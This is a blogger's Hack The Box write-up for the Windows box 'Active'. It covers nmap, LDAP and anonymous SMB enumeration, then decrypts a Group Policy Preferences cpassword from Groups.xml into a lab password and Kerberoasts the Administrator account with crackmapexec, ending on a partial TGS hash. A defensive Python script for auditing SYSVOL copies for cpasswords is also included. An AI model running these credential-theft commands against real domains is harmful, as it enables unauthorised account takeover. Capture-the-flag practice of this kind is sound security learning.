Active Writeup
Disclaimer
I'm just a beginner, but writing writeups makes me stronger, probably QQ
Please correct me if I'm wrong.
Unfamiliar techniques feel hard even when they are simple. For years I've inexplicably avoided Windows and never properly understood Active Directory, which was really foolish, so let revisiting this box I failed to finish years ago be the first step out of that. Active is one of the elder AD boxes on Hack The Box, and it is also recommended on TJnull's OSCP machine list; it suits newcomers practising AD techniques, from using SMB and decrypting GPP passwords[^1] to Kerberoasting[^2] and cracking the resulting hash offline, all of which are the most basic of basics.
Machine Information
Machine | Description
---|---
Name | Active
OS | Windows
Difficulty | Easy
Author | eks, mrb3n
Reconnaissance
Service Scan
As usual, I split the `nmap` scan into two passes: a first fast scan of all TCP ports, then a second detailed scan of the interesting ports (`-sC` for the default script scan, `-sV` for version detection); scanning everything in detail from the start would take far too long. This box must be running Active Directory (AD), after all it's called Active, right? More concretely, the fast scan lists quite a few Windows service ports, among them Kerberos, SMB and LDAP, which is practically a giveaway; the more detailed second scan makes it even clearer.
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -p- --min-rate 4242 -o recons/nmap/active-alltcp-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:14 CDT
Nmap scan report for 10.129.122.239
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -sCV -o recons/nmap/active-targeted-cv-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:15 CDT
Nmap scan report for 10.129.122.239
Host is up (0.056s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s
| smb2-time:
| date: 2023-05-29T02:20:58
|_ start_date: 2023-05-29T01:55:51
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds
That said, this time I was too lazy to tune the command and just ran the detailed scan over everything, which obviously takes a very long time, so while waiting I tried some other manual enumeration. What I most wanted to find was the domain name. Of course, you could also go brew a coffee and then read `active.htb` off the finished scan results.
`<MACHINE_NAME>.htb` is the common naming convention for HTB machine hostnames. You can find more information on HTB Meta.
LDAP Enumeration - Port 389
Since the fast scan listed LDAP, I use `ldapsearch` to query AD-related information, starting with the domain name: `active.htb`.
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b "" -s base defaultNamingContext
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: defaultNamingContext
#
#
dn:
defaultNamingContext: DC=active,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b 'DC=active,DC=htb' -D '' -w ''
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1
# numResponses: 1
It seems credentials are needed before any further enumeration is possible.
Other work done in this phase
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig -x 10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> -x 10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15559
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 3b8c232ab38e91a3bfda3e4564740cfe6cdc017eb9b3576f (good)
;; QUESTION SECTION:
;239.122.129.10.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
10.in-addr.arpa. 86400 IN SOA localhost. . 1 28800 7200 604800 86400
;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Sun May 28 21:25:02 CDT 2023
;; MSG SIZE rcvd: 128
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig AXFR @10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> AXFR @10.129.122.239
; (1 server found)
;; global options: +cmd
;; Query time: 52 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Thu Jun 01 04:09:05 CDT 2023
;; MSG SIZE rcvd: 40
I don't know why I even tried digging localhost at this point.
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig localhost @10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> localhost @10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 56014
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 847a6883003e4dbf (echoed)
;; QUESTION SECTION:
;localhost. IN A
;; Query time: 63 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Sun May 28 21:25:08 CDT 2023
;; MSG SIZE rcvd: 50
SMB Enumeration - Port 445
Start by trying an anonymous connection (no credentials); maybe some shares are accessible. Here are several ways to list SMB shares:
Basically, with `crackmapexec` there's no need to try the other two tools; I just felt like testing them.
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u '' -p '' --shares
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\:
SMB 10.129.122.239 445 DC [+] Enumerated shares
SMB 10.129.122.239 445 DC Share Permissions Remark
SMB 10.129.122.239 445 DC ----- ----------- ------
SMB 10.129.122.239 445 DC ADMIN$ Remote Admin
SMB 10.129.122.239 445 DC C$ Default share
SMB 10.129.122.239 445 DC IPC$ Remote IPC
SMB 10.129.122.239 445 DC NETLOGON Logon server share
SMB 10.129.122.239 445 DC Replication READ
SMB 10.129.122.239 445 DC SYSVOL Logon server share
SMB 10.129.122.239 445 DC Users
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbclient --no-pass -L //10.129.122.239
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.122.239 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
"Replication" is currently the only share with read permission; the word means "copy", so maybe it's a backup of the administrator's configuration? Out of curiosity, I connected over SMB to take a look.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbclient //10.129.122.239/Replication
Password for [WORKGROUP\xavier]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
active.htb D 0 Sat Jul 21 05:37:44 2018
10459647 blocks of size 4096. 5202562 blocks available
smb: \> ls active.htb\
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 05:37:44 2018
Policies D 0 Sat Jul 21 05:37:44 2018
scripts D 0 Wed Jul 18 13:48:57 2018
10459647 blocks of size 4096. 5202927 blocks available
smb: \>
Three directories are listed: `DfsrPrivate`, `Policies` and `scripts`. Since I couldn't make sense of them at first glance, I asked ChatGPT.
Question: Where do the following three directories: "DfsrPrivate", "Policies" and "Scripts" come from, and what is their purpose in AD?
ChatGPT:
The "DfsrPrivate," "Policies," and "Scripts" directories are all related to Active Directory (AD) and serve specific purposes within the system.
- DfsrPrivate: The "DfsrPrivate" directory is associated with the Distributed File System Replication (DFSR) service in Windows Server. DFSR enables the replication of files between multiple servers and ensures that the data remains consistent across all replicas. The "DfsrPrivate" directory is automatically created on each DFSR member server and contains the private metadata and staging files necessary for replication. It is a hidden system folder that should not be manually modified or deleted.
- Policies: The "Policies" directory is a crucial component of Group Policy in AD. Group Policy allows administrators to manage and configure various settings for user and computer accounts in an organization. The "Policies" directory, located within the SYSVOL shared folder on domain controllers, stores Group Policy objects (GPOs). GPOs contain the settings and preferences that are applied to the targeted user and computer accounts. The "Policies" directory structure organizes GPOs into individual folders based on globally unique identifiers (GUIDs) and version numbers.
- Scripts: The "Scripts" directory is associated with logon and logoff scripts in AD. Logon and logoff scripts are executed when users log on to or log off from a computer in an AD domain. These scripts can perform various tasks, such as mapping network drives, configuring printers, or running custom commands or applications. The "Scripts" directory, located within the SYSVOL shared folder on domain controllers, stores the scripts that are assigned to users or computers through Group Policy. The scripts can be written in different scripting languages, such as VBScript or PowerShell.

In summary, the "DfsrPrivate" directory is used by the DFSR service for file replication, the "Policies" directory is used to store Group Policy objects, and the "Scripts" directory is used to store logon and logoff scripts for executing specific actions during user sessions in an Active Directory environment.
The gist of ChatGPT's long answer is that `Policies` lives in `SYSVOL`, and `SYSVOL` also appeared in the share listing earlier (without read permission), so at this point I'm even more convinced that `Replication` is a backup. I could slowly browse around in SMB for interesting files, but I'd rather download the whole directory:
smb: \> mask ""
smb: \> recurse on # download all directories and files recursively
smb: \> prompt off # turn off prompting so you don't have to answer "yes" for every file
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.2 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.3 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.6 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.3 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \>
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbmap -H 10.129.122.239 -R Replication
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 05:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 05:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
Stealing a user password from Group Policy Preferences
After looking through every file, only `Groups.xml` is of any interest: it contains a username and a cpassword.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
A quick web search for "groups.xml hack" turns up an article on stealing passwords from Group Policy Preferences[^3]. It basically says that the `cpassword` in the XML is the user's password encrypted with AES-256, and that it can be decrypted trivially, with no brute force needed, because Microsoft published the encryption key in its official technical documentation. The XML also gives me an AD user account: `active.htb\SVC_TGS`.
For details, see my other note: [Stealing passwords via Group Policy Preferences](/zh-tw/Credential-Access/exploit-group-policy-preferences).
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
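The defender's counterpart to the decryption above is finding these files before anyone else does. The following is an added example, not code from the original writeup: it audits a local copy of SYSVOL for GPP preference XML that still carries a `cpassword` attribute, using the page's own `Groups.xml` plus two constructed files (placeholder GUIDs and a placeholder cpassword) as sample input.

```python
# Added example, not part of the original writeup: audit a local copy of
# SYSVOL (or a mirror of it such as this box's Replication share) for GPP
# XML that still carries a cpassword. Since MS14-025 the GPMC refuses to
# write new cpassword values, but files created earlier stay in SYSVOL,
# readable by every domain user, until someone finds and removes them.
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Sample 1: the Groups.xml found on this box's Replication share.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

# Sample 2 (constructed; placeholder GUIDs and cpassword): a mapped-drive
# preference that also embeds credentials.
SAMPLE_DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{00000000-0000-0000-0000-000000000001}"><Drive clsid="{00000000-0000-0000-0000-000000000002}" name="H:" status="H:" changed="2018-07-18 20:50:00" uid="{00000000-0000-0000-0000-000000000003}"><Properties action="U" thisDrive="SHOW" allDrives="NOSHOW" userName="active.htb\backup" cpassword="CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-VALUE" path="\\dc\backup" label="Backup" persistent="1" useLetter="1" letter="H"/></Drive>
</Drives>"""

# Sample 3 (constructed): a printer preference with no credentials.
SAMPLE_PRINTERS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Printers clsid="{00000000-0000-0000-0000-000000000004}"><SharedPrinter clsid="{00000000-0000-0000-0000-000000000005}" name="Office" status="Office" changed="2018-07-18 20:55:00" uid="{00000000-0000-0000-0000-000000000006}"><Properties action="U" comment="" path="\\dc\office" location="" default="0" skipLocal="0" deleteAll="0" persistent="0" deleteMaps="0" port=""/></SharedPrinter>
</Printers>"""


def find_cpasswords(xml_text: str, source: str) -> list[dict]:
    """Return one finding per element with a non-empty cpassword."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:  # absent or empty: no stored credential
            continue
        # Account: userName (Groups/Drives/DataSources), accountName
        # (Services) or runAs (ScheduledTasks); 'changed' is on the parent.
        account = (elem.get("userName") or elem.get("accountName")
                   or elem.get("runAs") or "<unknown>")
        changed = parents.get(elem, elem).get("changed", "")
        findings.append({"file": source, "account": account,
                         "cpassword": cpw, "changed": changed})
    return findings


def scan_sysvol(root: Path) -> list[dict]:
    """Walk a SYSVOL copy and collect cpassword findings from GPP files."""
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        rel = path.relative_to(root).as_posix()
        try:
            findings.extend(find_cpasswords(path.read_text("utf-8-sig"), rel))
        except ET.ParseError as exc:  # report, don't silently skip
            findings.append({"file": rel, "account": "<parse error>",
                             "cpassword": "", "changed": str(exc)})
    return findings


def demo() -> list[dict]:
    """Recreate the page's Policies layout in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        prefs = (Path(tmp) / "Policies" / "{31B2F340-016D-11D2-945F-00C04FB984F9}"
                 / "MACHINE" / "Preferences")
        for sub, text in (("Groups", SAMPLE_GROUPS_XML),
                          ("Drives", SAMPLE_DRIVES_XML),
                          ("Printers", SAMPLE_PRINTERS_XML)):
            (prefs / sub).mkdir(parents=True)
            (prefs / sub / f"{sub}.xml").write_text(text, encoding="utf-8")
        return scan_sysvol(Path(tmp))
```

Run `scan_sysvol` against a real SYSVOL copy to get the same findings list; each entry names the file, the account and the last change date, which is what you need to rotate the password and delete the preference item.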
Logging in to SMB as `SVC_TGS:GPPstillStandingStrong2k18` gives access to more shares.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.122.239 445 DC [+] Enumerated shares
SMB 10.129.122.239 445 DC Share Permissions Remark
SMB 10.129.122.239 445 DC ----- ----------- ------
SMB 10.129.122.239 445 DC ADMIN$ Remote Admin
SMB 10.129.122.239 445 DC C$ Default share
SMB 10.129.122.239 445 DC IPC$ Remote IPC
SMB 10.129.122.239 445 DC NETLOGON READ Logon server share
SMB 10.129.122.239 445 DC Replication READ
SMB 10.129.122.239 445 DC SYSVOL READ Logon server share
SMB 10.129.122.239 445 DC Users READ
Use `smbmap` or `crackmapexec` to enumerate the `Users` share, and find the user flag on the desktop.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
...
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 10:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 10:14:42 2018 ..
fw--w--w-- 34 Thu Jun 1 01:29:06 2023 user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users -A user.txt
[+] IP: 10.129.122.239:445 Name: active.htb
[+] Starting search for files matching 'user.txt' on share Users.
[+] Match found! Downloading: Users\SVC_TGS\Desktop\user.txt
Tip: or download a specific file directly
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --share Users --get-file SVC_TGS/Desktop/user.txt user.txt
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.122.239 445 DC [*] Copy SVC_TGS/Desktop/user.txt to user.txt
SMB 10.129.122.239 445 DC [+] File SVC_TGS/Desktop/user.txt was transferred to user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -M spider_plus --only-files -o READ_ONLY=false
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SPIDER_P... 10.129.122.239 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.129.122.239 445 DC [*] DIR: ['print$']
SPIDER_P... 10.129.122.239 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.129.122.239 445 DC [*] SIZE: 51200
SPIDER_P... 10.129.122.239 445 DC [*] OUTPUT: /tmp/cme_spider_plus
...
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ find /tmp/cme_spider_plus/10.129.122.239 -type f
...
/tmp/cme_spider_plus/10.129.122.239/Users/SVC_TGS/Desktop/user.txt
...
After getting the user flag I hit a wall. Going through every file under the `Users` share was no help, since they're all default files, so I had to peek at other people's writeups, and only then did I notice I'd completely forgotten there was still something I hadn't looked at!
Kerberoasting - Port 88
Never underestimate the power of ignorance: completely ignoring Kerberos, a core part of AD, is that effective. I had to start by reading around before I even learned the Kerberoast technique exists. In short, Kerberoast abuses the Kerberos mechanism to obtain a Ticket Granting Service (TGS) ticket, then brute-forces offline the password of the service account whose key encrypts that TGS.
For details, see my other note: [Kerberoast: abusing the mechanism and brute-forcing](/zh-tw/Credential-Access/kerberoast).
Remember to add the DC's domain name to /etc/hosts.
Obtaining the TGS hash
Use CrackMapExec to perform Kerberoasting. You can also search LDAP first to confirm whether any account has a servicePrincipalName set, and only then request its TGS.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec ldap 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP 10.129.122.239 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.122.239 389 DC [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP 10.129.122.239 389 DC sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-18 14:06:40.351723 lastLogon:2023-06-01 01:29:13.530504
LDAP 10.129.122.239 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae62951b4c98375f7aaad3fad9a$...
